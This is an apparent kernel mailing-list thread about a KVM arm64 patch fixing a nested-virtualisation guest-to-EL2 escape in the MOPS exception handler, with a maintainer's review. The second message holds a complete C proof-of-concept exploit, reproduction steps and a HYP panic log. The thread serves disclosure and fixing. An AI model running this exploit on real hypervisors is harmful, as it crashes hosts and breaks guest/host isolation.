* [PATCH] KVM: arm64: nv: Translate vEL2 PSTATE to EL1 in kvm_hyp_handle_mops()
@ 2026-06-16 11:49 Weiming Shi
2026-06-16 12:03 ` Weiming Shi
2026-06-16 20:14 ` Oliver Upton
0 siblings, 2 replies; 3+ messages in thread
From: Weiming Shi @ 2026-06-16 11:49 UTC (permalink / raw)
To: Marc Zyngier, Oliver Upton, Catalin Marinas, Will Deacon
Cc: Joey Gouly, Steffen Eiden, Suzuki K Poulose, Zenghui Yu,
Andrew Morton, Jakub Kicinski, Bjorn Andersson, Mark Rutland,
Kristina Martsenko, linux-arm-kernel, kvmarm, Zhong Wang,
Xuanqing Shi, Weiming Shi
When a nested virtualisation guest is running its virtual EL2 (vEL2),
fixup_guest_exit() rewrites vcpu_cpsr() to the guest's virtual exception
level: a hardware PSTATE.M of EL1{t,h} is presented as EL2{t,h}. The
hardware, however, executes vEL2 at EL1.
kvm_hyp_handle_mops() runs on the fast guest re-entry path, where it
clears the single-step bit and restores SPSR_EL2 directly from
vcpu_cpsr():
*vcpu_cpsr(vcpu) &= ~DBG_SPSR_SS;
write_sysreg_el2(*vcpu_cpsr(vcpu), SYS_SPSR);
For a guest hypervisor this writes the vEL2 view (PSTATE.M == EL2h) into
the hardware SPSR_EL2 without translating it back. The fast path re-enters
the guest via __guest_enter()/ERET without going through
__sysreg_restore_el2_return_state(), so neither to_hw_pstate() nor the
"return to a less privileged mode" safety check there (which would set
PSR_IL_BIT) is applied. The ERET therefore restores PSTATE.M = EL2h and
re-enters the guest at the real EL2 with a guest-controlled ELR, escaping
stage-2 and the guest/host boundary.
This is reachable on a kernel with FEAT_MOPS running a KVM nested guest
(kvm-arm.mode=nested): KVM sets HCRX_EL2.MCE2, which the guest hypervisor
cannot clear for its own context (is_nested_ctxt() is false), so a vEL2
MOPS exception is taken to the host and dispatched to kvm_hyp_handle_mops()
with VCPU_IN_HYP_CONTEXT set.
Translate EL2{t,h} back to EL1{t,h} before writing SPSR_EL2, mirroring
kvm_hyp_handle_eret(). For non-nested guests vcpu_cpsr() never holds an
EL2 mode, so the translation is a no-op and behaviour is unchanged.
Fixes: 2de451a329cf ("KVM: arm64: Add handler for MOPS exceptions")
Assisted-by: Claude:claude-opus-4-8
Reported-by: Zhong Wang <wangzhong.c0ss4ck@bytedance.com>
Reported-by: Xuanqing Shi <shixuanqing.11@bytedance.com>
Signed-off-by: Weiming Shi <bestswngs@gmail.com>
---
arch/arm64/kvm/hyp/include/hyp/switch.h | 23 ++++++++++++++++++++++-
1 file changed, 22 insertions(+), 1 deletion(-)
diff --git a/arch/arm64/kvm/hyp/include/hyp/switch.h b/arch/arm64/kvm/hyp/include/hyp/switch.h
index e9b36a3b27bbc..a6b7963ddbf0b 100644
--- a/arch/arm64/kvm/hyp/include/hyp/switch.h
+++ b/arch/arm64/kvm/hyp/include/hyp/switch.h
@@ -448,6 +448,8 @@ static inline bool __populate_fault_info(struct kvm_vcpu *vcpu)
static inline bool kvm_hyp_handle_mops(struct kvm_vcpu *vcpu, u64 *exit_code)
{
+ u64 spsr, mode;
+
*vcpu_pc(vcpu) = read_sysreg_el2(SYS_ELR);
arm64_mops_reset_regs(vcpu_gp_regs(vcpu), vcpu->arch.fault.esr_el2);
write_sysreg_el2(*vcpu_pc(vcpu), SYS_ELR);
@@ -457,7 +459,26 @@ static inline bool kvm_hyp_handle_mops(struct kvm_vcpu *vcpu, u64 *exit_code)
* instruction.
*/
*vcpu_cpsr(vcpu) &= ~DBG_SPSR_SS;
- write_sysreg_el2(*vcpu_cpsr(vcpu), SYS_SPSR);
+
+ /*
+ * For a guest hypervisor, vcpu_cpsr() holds the vEL2 view
+ * (PSTATE.M == EL2h) installed by fixup_guest_exit(), but vEL2
+ * runs at EL1. Translate it back before restoring SPSR_EL2, as in
+ * kvm_hyp_handle_eret().
+ */
+ spsr = *vcpu_cpsr(vcpu);
+ mode = spsr & (PSR_MODE_MASK | PSR_MODE32_BIT);
+ switch (mode) {
+ case PSR_MODE_EL2t:
+ mode = PSR_MODE_EL1t;
+ break;
+ case PSR_MODE_EL2h:
+ mode = PSR_MODE_EL1h;
+ break;
+ }
+ spsr = (spsr & ~(PSR_MODE_MASK | PSR_MODE32_BIT)) | mode;
+
+ write_sysreg_el2(spsr, SYS_SPSR);
return true;
}
--
2.43.0
^ permalink raw reply related [flat|nested] 3+ messages in thread
* Re: [PATCH] KVM: arm64: nv: Translate vEL2 PSTATE to EL1 in kvm_hyp_handle_mops()
2026-06-16 11:49 [PATCH] KVM: arm64: nv: Translate vEL2 PSTATE to EL1 in kvm_hyp_handle_mops() Weiming Shi
@ 2026-06-16 12:03 ` Weiming Shi
2026-06-16 20:14 ` Oliver Upton
1 sibling, 0 replies; 3+ messages in thread
From: Weiming Shi @ 2026-06-16 12:03 UTC (permalink / raw)
To: Marc Zyngier, Oliver Upton, Catalin Marinas, Will Deacon
Cc: Joey Gouly, Steffen Eiden, Suzuki K Poulose, Zenghui Yu,
Andrew Morton, Jakub Kicinski, Bjorn Andersson, Mark Rutland,
Kristina Martsenko, linux-arm-kernel, kvmarm, Zhong Wang,
Xuanqing Shi
Reproduction Steps:
1. prepare arm64 kernel image
```
make ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- defconfig
./scripts/config -e VIRTUALIZATION -e KVM
make ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- olddefconfig
make ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- -j$(nproc) Image
make ARCH=arm64 headers_install INSTALL_HDR_PATH=/tmp/khdr
```
2. prepare qemu + initramfs
3. boot qemu with the kernel iamge
```
qemu-system-aarch64 \
-machine virt,virtualization=on,gic-version=3 -cpu max -accel tcg \
-smp 2 -m 2G -kernel arch/arm64/boot/Image -initrd initramfs.cpio.gz \
-append "console=ttyAMA0 kvm-arm.mode=nested rdinit=/init panic=-1 oops=panic" \
-nographic -no-reboot
```
PoC:
```
/*
* PoC: kvm_hyp_handle_mops SPSR_EL2 privilege escalation (EL1 -> EL2)
*
* Demonstrates that kvm_hyp_handle_mops writes un-translated PSR_MODE_EL2h
* into hardware SPSR_EL2 on the fast-reentry path, allowing a nested guest
* to escape to real EL2 after an EC_MOPS trap.
*
* Build: aarch64-linux-gnu-gcc -static -O0 -o poc_mops poc_mops_clean.c
* Run: sudo ./poc_mops
*
* Expected result on vulnerable kernel: HYP panic with PS:00000009 (EL2h)
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <errno.h>
#include <linux/kvm.h>
#define KVM_ARM_VCPU_HAS_EL2 7
#define PSR_MODE_EL1h 0x00000005
#define PSR_MODE_EL2h 0x00000009
#define ARM64_CORE_REG(u32_off) (0x6030000000100000ULL | (uint64_t)(u32_off))
#define REG_X(n) ARM64_CORE_REG((n) * 2)
#define REG_SP ARM64_CORE_REG(62)
#define REG_PC ARM64_CORE_REG(64)
#define REG_PSTATE ARM64_CORE_REG(66)
#define GUEST_MEM_SIZE (64 * 1024 * 1024)
#define GUEST_CODE_ADDR 0x40000000ULL
#define GUEST_STACK_TOP (GUEST_CODE_ADDR + GUEST_MEM_SIZE - 0x1000)
#define MMIO_ADDR 0x10000000ULL
static int kvm_set_one_reg(int fd, uint64_t id, uint64_t val)
{
struct kvm_one_reg r = { .id = id, .addr = (uint64_t)&val };
return ioctl(fd, KVM_SET_ONE_REG, &r);
}
static int kvm_get_one_reg(int fd, uint64_t id, uint64_t *val)
{
struct kvm_one_reg r = { .id = id, .addr = (uint64_t)val };
return ioctl(fd, KVM_GET_ONE_REG, &r);
}
static void die(const char *msg) { perror(msg); exit(1); }
/*
* Guest code (runs at virtual EL2h).
*
* Triggers EC_MOPS by executing CPYP (prologue, large size so it doesn't
* complete in prologue phase) followed immediately by CPYE (epilogue).
* The CPU detects PSTATE.MOPS_STATE mismatch and traps.
*
* kvm_hyp_handle_mops resets PC -= 8 (for epilogue) and writes vcpu_cpsr
* (which contains EL2h after fixup_guest_exit reverse translation) directly
* to HW SPSR_EL2 without forward translation. On eret, the CPU enters
* real EL2h at the guest PC, causing an instruction abort (no EL2 mapping
* for guest addresses) -> HYP panic.
*
* Layout (offsets from GUEST_CODE_ADDR):
* +0x00 setup x0,x1,x2,x3
* +0x10 movz x9, #0
* +0x14 mrs x10, CurrentEL ; record EL before
* +0x18 str x10, [x3] ; MMIO exit #1
* +0x1C b +16 ; jump to cpyp at +0x2C
* +0x20 nop
* +0x24 nop
* +0x28 mrs x11, CurrentEL ; <-- RESET LANDS HERE (0x30-8)
* +0x2C cpyp [x0]!, [x1]!, x2!
* +0x30 cpye [x0]!, [x1]!, x2! ; EC_MOPS trap
* +0x34 str x11, [x3] ; MMIO exit #2 (after 2nd pass)
* +0x38 b . ; done
*/
static const uint32_t guest_code[] = {
0xd2a80200, /* +0x00 movz x0, #0x4010, lsl #16 (dest = 0x40100000) */
0xd2a80401, /* +0x04 movz x1, #0x4020, lsl #16 (src = 0x40200000) */
0xd2a00202, /* +0x08 movz x2, #0x10, lsl #16 (size = 1MB) */
0xd2a20003, /* +0x0C movz x3, #0x1000, lsl #16 (MMIO = 0x10000000) */
0xd2800009, /* +0x10 movz x9, #0 */
0xd538424a, /* +0x14 mrs x10, CurrentEL */
0xf900006a, /* +0x18 str x10, [x3] */
0x14000004, /* +0x1C b +16 -> +0x2C */
0xd503201f, /* +0x20 nop */
0xd503201f, /* +0x24 nop */
0xd538424b, /* +0x28 mrs x11, CurrentEL (AFTER eret) */
0x1d010440, /* +0x2C cpyp [x0]!, [x1]!, x2! */
0x1d810440, /* +0x30 cpye [x0]!, [x1]!, x2! -> EC_MOPS */
0xf900006b, /* +0x34 str x11, [x3] */
0x14000000, /* +0x38 b . */
};
int main(void)
{
int kvm_fd, vm_fd, vcpu_fd, ret;
struct kvm_vcpu_init vcpu_init = {};
struct kvm_run *run;
void *guest_mem;
setbuf(stdout, NULL);
setbuf(stderr, NULL);
printf("[*] kvm_hyp_handle_mops SPSR privilege escalation PoC\n");
printf("[*] Target: Linux kernel with CONFIG_KVM_ARM_NV + FEAT_MOPS\n\n");
kvm_fd = open("/dev/kvm", O_RDWR);
if (kvm_fd < 0) die("open /dev/kvm");
vm_fd = ioctl(kvm_fd, KVM_CREATE_VM, 0);
if (vm_fd < 0) die("KVM_CREATE_VM");
/* Guest memory */
guest_mem = mmap(NULL, GUEST_MEM_SIZE, PROT_READ | PROT_WRITE,
MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (guest_mem == MAP_FAILED) die("mmap");
struct kvm_userspace_memory_region region = {
.slot = 0,
.guest_phys_addr = GUEST_CODE_ADDR,
.memory_size = GUEST_MEM_SIZE,
.userspace_addr = (uint64_t)guest_mem,
};
if (ioctl(vm_fd, KVM_SET_USER_MEMORY_REGION, ®ion) < 0)
die("KVM_SET_USER_MEMORY_REGION");
memcpy(guest_mem, guest_code, sizeof(guest_code));
/* Create vCPU with nested virtualization */
vcpu_fd = ioctl(vm_fd, KVM_CREATE_VCPU, 0);
if (vcpu_fd < 0) die("KVM_CREATE_VCPU");
if (ioctl(vm_fd, KVM_ARM_PREFERRED_TARGET, &vcpu_init) < 0)
die("KVM_ARM_PREFERRED_TARGET");
vcpu_init.features[0] |= (1 << KVM_ARM_VCPU_HAS_EL2);
if (ioctl(vcpu_fd, KVM_ARM_VCPU_INIT, &vcpu_init) < 0) {
perror("KVM_ARM_VCPU_INIT with HAS_EL2");
printf("[-] Nested virtualization not supported.\n");
return 1;
}
printf("[+] vCPU created with nested virt (NV)\n");
/* GICv3 (required before KVM_RUN) */
{
struct kvm_create_device gic_dev = { .type = KVM_DEV_TYPE_ARM_VGIC_V3 };
if (ioctl(vm_fd, KVM_CREATE_DEVICE, &gic_dev) < 0)
die("KVM_CREATE_DEVICE GICv3");
uint64_t dist = 0x08000000ULL, redist = 0x080A0000ULL;
struct kvm_device_attr attr = {
.group = KVM_DEV_ARM_VGIC_GRP_ADDR,
.attr = KVM_VGIC_V3_ADDR_TYPE_DIST,
.addr = (uint64_t)&dist,
};
ioctl(gic_dev.fd, KVM_SET_DEVICE_ATTR, &attr);
attr.attr = KVM_VGIC_V3_ADDR_TYPE_REDIST;
attr.addr = (uint64_t)&redist;
ioctl(gic_dev.fd, KVM_SET_DEVICE_ATTR, &attr);
attr = (struct kvm_device_attr){
.group = KVM_DEV_ARM_VGIC_GRP_CTRL,
.attr = KVM_DEV_ARM_VGIC_CTRL_INIT,
};
ioctl(gic_dev.fd, KVM_SET_DEVICE_ATTR, &attr);
printf("[+] GICv3 initialized\n");
}
/* Set vCPU state: start at virtual EL2h */
kvm_set_one_reg(vcpu_fd, REG_PC, GUEST_CODE_ADDR);
kvm_set_one_reg(vcpu_fd, REG_SP, GUEST_STACK_TOP);
if (kvm_set_one_reg(vcpu_fd, REG_PSTATE, PSR_MODE_EL2h) < 0) {
printf("[!] Cannot set EL2h, falling back to EL1h\n");
kvm_set_one_reg(vcpu_fd, REG_PSTATE, PSR_MODE_EL1h);
}
printf("[+] vCPU: PC=0x%llx PSTATE=EL2h SP=0x%llx\n",
(unsigned long long)GUEST_CODE_ADDR,
(unsigned long long)GUEST_STACK_TOP);
/* Map kvm_run */
int run_size = ioctl(kvm_fd, KVM_GET_VCPU_MMAP_SIZE, 0);
run = mmap(NULL, run_size, PROT_READ | PROT_WRITE, MAP_SHARED, vcpu_fd, 0);
if (run == MAP_FAILED) die("mmap vcpu");
/* Execute guest */
printf("\n[*] Running guest. If kernel panics -> vulnerability confirmed.\n\n");
int mmio_count = 0;
uint64_t el_before = 0, el_after = 0;
for (int i = 0; i < 100; i++) {
ret = ioctl(vcpu_fd, KVM_RUN, 0);
if (ret < 0) {
printf("[-] KVM_RUN failed: %s (errno=%d)\n", strerror(errno), errno);
break;
}
switch (run->exit_reason) {
case KVM_EXIT_MMIO:
if (run->mmio.is_write && run->mmio.phys_addr == MMIO_ADDR) {
uint64_t val = 0;
memcpy(&val, run->mmio.data, run->mmio.len);
mmio_count++;
printf("[+] MMIO #%d: CurrentEL = 0x%llx (EL%lld)\n",
mmio_count, (unsigned long long)val, (long long)(val >> 2) & 3);
if (mmio_count == 1) el_before = (val >> 2) & 3;
if (mmio_count == 2) { el_after = (val >> 2) & 3; goto results; }
}
break;
case KVM_EXIT_INTERNAL_ERROR:
printf("[!] INTERNAL_ERROR: safety assert may have caught EL2h SPSR\n");
goto done;
case KVM_EXIT_FAIL_ENTRY:
printf("[-] FAIL_ENTRY: 0x%llx\n",
(unsigned long long)run->fail_entry.hardware_entry_failure_reason);
goto done;
default:
printf("[*] exit_reason=%d (iter %d)\n", run->exit_reason, i);
break;
}
}
printf("[-] Max iterations reached without result.\n");
goto done;
results:
printf("\n========== RESULTS ==========\n");
printf(" EL before MOPS: EL%lld\n", (long long)el_before);
printf(" EL after MOPS: EL%lld\n", (long long)el_after);
printf("=============================\n\n");
if (el_after > el_before)
printf("[!!!] PRIVILEGE ESCALATION: EL%lld -> EL%lld\n",
(long long)el_before, (long long)el_after);
else
printf("[+] No escalation observed in guest registers.\n");
done:
printf("\n[*] Check dmesg for HYP panic:\n");
printf(" dmesg | grep -i 'hyp panic\\|PS:.*0009'\n");
printf("[*] If PS:00000009 appears -> SPSR contained EL2h -> vuln confirmed.\n");
close(vcpu_fd);
close(vm_fd);
close(kvm_fd);
munmap(guest_mem, GUEST_MEM_SIZE);
munmap(run, run_size);
return 0;
}
```
crash log
```
========== FatalMOPS dynamic test (L1 host) ==========
[*] CPU ID registers (FEAT_MOPS bits[19:16] of isar2; FEAT_NV bits[27:24] of mmfr2):
/sys/devices/system/cpu/cpu0/regs/identification/id_aa64isar2_el1: (absent)
/sys/devices/system/cpu/cpu0/regs/identification/id_aa64mmfr2_el1: (absent)
[+] /dev/kvm present
[*] dmesg nested-virt lines:
[*] launching /poc ...
[*] FatalMOPS PoC: kvm_hyp_handle_mops vEL2->EL2 escape
[+] vCPU created with nested virt (HAS_EL2)
[+] GICv3 initialized
[+] vCPU starts at virtual EL2h
[*] Running guest. Vulnerable kernel -> HYP panic expected.
[+] MMIO #1: CurrentEL=EL2
[ 3.326956] Kernel panic - not syncing: HYP panic:
[ 3.326956] PS:00000009 PC:0000000040000028 ESR:86000005
[ 3.326956] FAR:0000000040000028 HPFAR:0000000000402000 PAR:1de7ec7edbadc0de
[ 3.326956] VCPU:000000006f4e5727
[ 3.342728] CPU: 0 UID: 0 PID: 59 Comm: poc Not tainted 7.1.0-rc7-00217-gfbc6a80cb5d3 #1 PREEMPT
[ 3.349460] Hardware name: linux,dummy-virt (DT)
[ 3.353136] Call trace:
[ 3.355241] show_stack+0x18/0x24 (C)
[ 3.358652] dump_stack_lvl+0x34/0x8c
[ 3.361515] dump_stack+0x18/0x24
[ 3.364085] vpanic+0x47c/0x4dc
[ 3.366527] do_panic_on_target_cpu+0x0/0x1c
[ 3.369782] kvm_unexpected_el2_exception+0x0/0x3c0
[ 3.373494] hyp_panic+0x0/0x80
[ 3.375940] kvm_arm_vcpu_enter_exit+0x64/0x94
[ 3.379372] kvm_arch_vcpu_ioctl_run+0x27c/0x8f8
[ 3.382919] kvm_vcpu_ioctl+0x174/0xa38
[ 3.385894] __arm64_sys_ioctl+0xac/0x104
[ 3.389105] invoke_syscall+0x54/0x10c
[ 3.392015] el0_svc_common.constprop.0+0x40/0xe0
[ 3.395653] do_el0_svc+0x1c/0x28
[ 3.398236] el0_svc+0x38/0x11c
[ 3.400681] el0t_64_sync_handler+0xa0/0xe4
[ 3.403872] el0t_64_sync+0x198/0x19c
[ 3.407083] SMP: stopping secondary CPUs
[ 3.410661] Kernel Offset: 0x127592c00000 from 0xffff800080000000
[ 3.415585] PHYS_OFFSET: 0x40000000
[ 3.418668] CPU features: 0x00000000,0034e00b,ffeec7e1,9d7e7f3f
[ 3.423170] Memory Limit: none
```
after decode
```
Kernel panic - not syncing: HYP panic:
PS:00000009 PC:0000000040000028 ESR:86000005
FAR:0000000040000028 HPFAR:0000000000402000 PAR:1de7ec7edbadc0de
VCPU:000000006f4e5727
CPU: 0 UID: 0 PID: 59 Comm: poc Not tainted 7.1.0-rc7-00217-gfbc6a80cb5d3 #1 PREEMPT
Call trace:
show_stack (arch/arm64/kernel/stacktrace.c:499)
dump_stack_lvl (lib/dump_stack.c:94 120)
dump_stack (lib/dump_stack.c:129)
vpanic (kernel/panic.c:650)
do_panic_on_target_cpu (kernel/panic.c:341)
kvm_unexpected_el2_exception (arch/arm64/kvm/hyp/include/hyp/switch.h:964
→ arch/arm64/kvm/hyp/vhe/switch.c:688)
hyp_panic (arch/arm64/kvm/hyp/vhe/switch.c:678)
kvm_arm_vcpu_enter_exit (arch/arm64/kvm/arm.c:1227)
kvm_arch_vcpu_ioctl_run (arch/arm64/kvm/arm.c:1324)
kvm_vcpu_ioctl (virt/kvm/kvm_main.c:4470)
__arm64_sys_ioctl (fs/ioctl.c:51 597 583)
invoke_syscall (arch/arm64/kernel/syscall.c:35 49)
el0_svc_common.constprop.0 (arch/arm64/kernel/syscall.c:121)
do_el0_svc (arch/arm64/kernel/syscall.c:140)
el0_svc (arch/arm64/kernel/entry-common.c:740)
el0t_64_sync_handler (arch/arm64/kernel/entry-common.c:759)
el0t_64_sync (arch/arm64/kernel/entry.S:594)
```
^ permalink raw reply [flat|nested] 3+ messages in thread
* Re: [PATCH] KVM: arm64: nv: Translate vEL2 PSTATE to EL1 in kvm_hyp_handle_mops()
2026-06-16 11:49 [PATCH] KVM: arm64: nv: Translate vEL2 PSTATE to EL1 in kvm_hyp_handle_mops() Weiming Shi
2026-06-16 12:03 ` Weiming Shi
@ 2026-06-16 20:14 ` Oliver Upton
1 sibling, 0 replies; 3+ messages in thread
From: Oliver Upton @ 2026-06-16 20:14 UTC (permalink / raw)
To: Weiming Shi
Cc: Marc Zyngier, Catalin Marinas, Will Deacon, Joey Gouly,
Steffen Eiden, Suzuki K Poulose, Zenghui Yu, Andrew Morton,
Jakub Kicinski, Bjorn Andersson, Mark Rutland, Kristina Martsenko,
linux-arm-kernel, kvmarm, Zhong Wang, Xuanqing Shi
Hi Weiming,
Thanks for the fix.
On Tue, Jun 16, 2026 at 07:49:44PM +0800, Weiming Shi wrote:
> When a nested virtualisation guest is running its virtual EL2 (vEL2),
> fixup_guest_exit() rewrites vcpu_cpsr() to the guest's virtual exception
> level: a hardware PSTATE.M of EL1{t,h} is presented as EL2{t,h}. The
> hardware, however, executes vEL2 at EL1.
>
> kvm_hyp_handle_mops() runs on the fast guest re-entry path, where it
> clears the single-step bit and restores SPSR_EL2 directly from
> vcpu_cpsr():
>
> *vcpu_cpsr(vcpu) &= ~DBG_SPSR_SS;
> write_sysreg_el2(*vcpu_cpsr(vcpu), SYS_SPSR);
>
> For a guest hypervisor this writes the vEL2 view (PSTATE.M == EL2h) into
> the hardware SPSR_EL2 without translating it back. The fast path re-enters
> the guest via __guest_enter()/ERET without going through
> __sysreg_restore_el2_return_state(), so neither to_hw_pstate() nor the
> "return to a less privileged mode" safety check there (which would set
> PSR_IL_BIT) is applied. The ERET therefore restores PSTATE.M = EL2h and
> re-enters the guest at the real EL2 with a guest-controlled ELR, escaping
> stage-2 and the guest/host boundary.
>
> This is reachable on a kernel with FEAT_MOPS running a KVM nested guest
> (kvm-arm.mode=nested): KVM sets HCRX_EL2.MCE2, which the guest hypervisor
> cannot clear for its own context (is_nested_ctxt() is false), so a vEL2
> MOPS exception is taken to the host and dispatched to kvm_hyp_handle_mops()
> with VCPU_IN_HYP_CONTEXT set.
>
> Translate EL2{t,h} back to EL1{t,h} before writing SPSR_EL2, mirroring
> kvm_hyp_handle_eret(). For non-nested guests vcpu_cpsr() never holds an
> EL2 mode, so the translation is a no-op and behaviour is unchanged.
The changelog is unnecessarily verbose, instead:
kvm_hyp_handle_mops() resets the single-step state machine as part of
rewinding state for a MOPS exception by modifying vcpu_cpsr() and
writing the result directly into hardware.
In the case of nested virtualization, vcpu_cpsr() is a synthetic value
such that the rest of KVM can deal with vEL2 cleanly. That means the
value requires translation before being written into hardware, which is
unfortunately missing from the MOPS handler.
Fix it by directly modifying SPSR_EL2 and avoiding the synthetic state
altogether, which will be resynchronized on the next 'full' exit back
to KVM.
Also:
Cc: stable@vger.kernel.org
Definitely meets the bar :)
> Fixes: 2de451a329cf ("KVM: arm64: Add handler for MOPS exceptions")
> Assisted-by: Claude:claude-opus-4-8
> Reported-by: Zhong Wang <wangzhong.c0ss4ck@bytedance.com>
> Reported-by: Xuanqing Shi <shixuanqing.11@bytedance.com>
> Signed-off-by: Weiming Shi <bestswngs@gmail.com>
> ---
> arch/arm64/kvm/hyp/include/hyp/switch.h | 23 ++++++++++++++++++++++-
> 1 file changed, 22 insertions(+), 1 deletion(-)
>
> diff --git a/arch/arm64/kvm/hyp/include/hyp/switch.h b/arch/arm64/kvm/hyp/include/hyp/switch.h
> index e9b36a3b27bbc..a6b7963ddbf0b 100644
> --- a/arch/arm64/kvm/hyp/include/hyp/switch.h
> +++ b/arch/arm64/kvm/hyp/include/hyp/switch.h
> @@ -448,6 +448,8 @@ static inline bool __populate_fault_info(struct kvm_vcpu *vcpu)
>
> static inline bool kvm_hyp_handle_mops(struct kvm_vcpu *vcpu, u64 *exit_code)
> {
> + u64 spsr, mode;
> +
> *vcpu_pc(vcpu) = read_sysreg_el2(SYS_ELR);
> arm64_mops_reset_regs(vcpu_gp_regs(vcpu), vcpu->arch.fault.esr_el2);
> write_sysreg_el2(*vcpu_pc(vcpu), SYS_ELR);
> @@ -457,7 +459,26 @@ static inline bool kvm_hyp_handle_mops(struct kvm_vcpu *vcpu, u64 *exit_code)
> * instruction.
> */
> *vcpu_cpsr(vcpu) &= ~DBG_SPSR_SS;
> - write_sysreg_el2(*vcpu_cpsr(vcpu), SYS_SPSR);
> +
> + /*
> + * For a guest hypervisor, vcpu_cpsr() holds the vEL2 view
> + * (PSTATE.M == EL2h) installed by fixup_guest_exit(), but vEL2
> + * runs at EL1. Translate it back before restoring SPSR_EL2, as in
> + * kvm_hyp_handle_eret().
> + */
> + spsr = *vcpu_cpsr(vcpu);
> + mode = spsr & (PSR_MODE_MASK | PSR_MODE32_BIT);
> + switch (mode) {
> + case PSR_MODE_EL2t:
> + mode = PSR_MODE_EL1t;
> + break;
> + case PSR_MODE_EL2h:
> + mode = PSR_MODE_EL1h;
> + break;
> + }
> + spsr = (spsr & ~(PSR_MODE_MASK | PSR_MODE32_BIT)) | mode;
> +
> + write_sysreg_el2(spsr, SYS_SPSR);
As I allude to in the modified changelog, I'd rather we just manipulate
the hardware value of SPSR_EL2 directly. We already do this in
kvm_hyp_handle_eret()
spsr = read_sysreg_el2(SYS_SPSR);
write_sysreg_el2(spsr & ~DBG_SPSR_SS, SYS_SPSR);
Thanks,
Oliver
^ permalink raw reply [flat|nested] 3+ messages in thread
end of thread, other threads:[~2026-06-16 20:14 UTC | newest]
Thread overview: 3+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2026-06-16 11:49 [PATCH] KVM: arm64: nv: Translate vEL2 PSTATE to EL1 in kvm_hyp_handle_mops() Weiming Shi
2026-06-16 12:03 ` Weiming Shi
2026-06-16 20:14 ` Oliver Upton
This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox